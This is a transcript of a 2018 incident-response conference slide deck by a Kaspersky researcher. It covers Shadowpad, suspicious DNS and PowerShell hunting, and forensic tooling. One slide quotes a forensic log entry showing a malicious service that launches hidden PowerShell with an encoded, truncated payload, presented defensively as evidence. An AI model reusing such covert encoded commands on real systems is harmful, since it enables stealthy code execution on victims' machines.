Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Sergey Golovanov - Indecent Response 2018

DC7499
February 10, 2018

Sergey Golovanov - Indecent Response 2018

DC7499

February 10, 2018
Tweet

More Decks by DC7499

Other Decks in Education

Transcript

  1. Indecent response 2018
    Sergey @k1k_ Golovanov
    Principal Security Researcher
    Kaspersky Lab

    View Slide

  2. Challenge: find a SDC bus speed

    View Slide

  3. View Slide

  4. Agenda
    1.Shadowpad
    2.0x403AA91EE
    4.Plans
    3.Scanner2

    View Slide

  5. 1.Shadowpad

    View Slide

  6. Case overview:
    1.Antifraud system in a bank is detecting
    printing of a lot of elite cards for the last several
    hours
    2.Bank is starting network audit
    3.Bank is discovering suspicion DNS requests
    4.Forensics can not find malware on PCs
    5.Bank asks for help…

    View Slide

  7. DNS requests

    View Slide

  8. View Slide

  9. View Slide

  10. “Our worldwide customers range from
    small businesses right up to global Fortune
    500 companies.” NetSarang
    AmericanExpress
    BankofAmericaCorp.
    BankofChina
    BNPParibas
    Citigroup
    DeutscheBank
    Fortis
    GeneralElectric
    INGGroup
    MerrillLynch
    MorganStanley
    ShinhanFinancialGroup
    SocieteGenerale
    UBS
    https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara
    ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru

    View Slide

  11. https://securelist.com/shadowpad
    -in-corporate-networks/81432/

    View Slide

  12. What was done?

    View Slide

  13. AutoMA – static analysis framework

    View Slide

  14. Shadowpad after autoMA

    View Slide

  15. Miniduke after autoMA

    View Slide

  16. 2.0x403AA91EE

    View Slide

  17. Case overview:

    View Slide

  18. View Slide

  19. View Slide

  20. How to find suspicion DNS requests?
    sort | uniq -c | sort -rn

    View Slide

  21. How to find suspicion powershell?
    sort | uniq -c | sort -rn

    View Slide

  22. parse_evtx.exe System.evtx | findstr /i "power" | more
    Record #2396788 2027.02.22-08:03:00 'Computer':PC1',
    'Channel':'System', 'EventSourceName':'Service Control Manager',
    'Guid':‘GUID'Name':'Service Control Manager',
    'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04,
    'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the
    system.), 'Qualifiers':16384, 'Keywords':8080000000000000,
    'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692,
    'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID,
    'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min
    powershell.exe -nop -w hidden -encodedcommand
    JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A
    FMAdAByAGUAYQBtACgA

    View Slide

  23. https://github.com/KasperskyLab/ForensicsTools/

    View Slide

  24. 3.Scanner2

    View Slide

  25. Case overview:
    1. No money
    2. No logs
    3. No team
    4. No idea about network
    5. CISO!

    View Slide

  26. What to do?
    we need logs
    we need mfts
    we need regs

    View Slide

  27. WE NEED TO RECOMPILE EVERYTHING!

    View Slide

  28. Awesome batch file

    View Slide

  29. How to find something suspicion ?
    sort | uniq -c | sort -rn

    View Slide

  30. https://cdn.securelist.com/files/
    2017/12/HappyNewYear.zip

    View Slide

  31. 4. PLANS

    View Slide

  32. 1. MFT is a hell. Sleuthkit is not enough. We need
    more data about deleted files.
    2. USN J is required with no HDD touch.
    3. Reg analysis is needed with unallocated part.

    View Slide

  33. Agenda
    1.Shadowpad
    2.0x403AA91EE
    4.Plans
    3.Scanner2

    View Slide

  34. Зачем?

    View Slide

  35. View Slide

  36. Thank you!
    Sergey @k1k_ Golovanov
    Principal Security Researcher
    Kaspersky Lab

    View Slide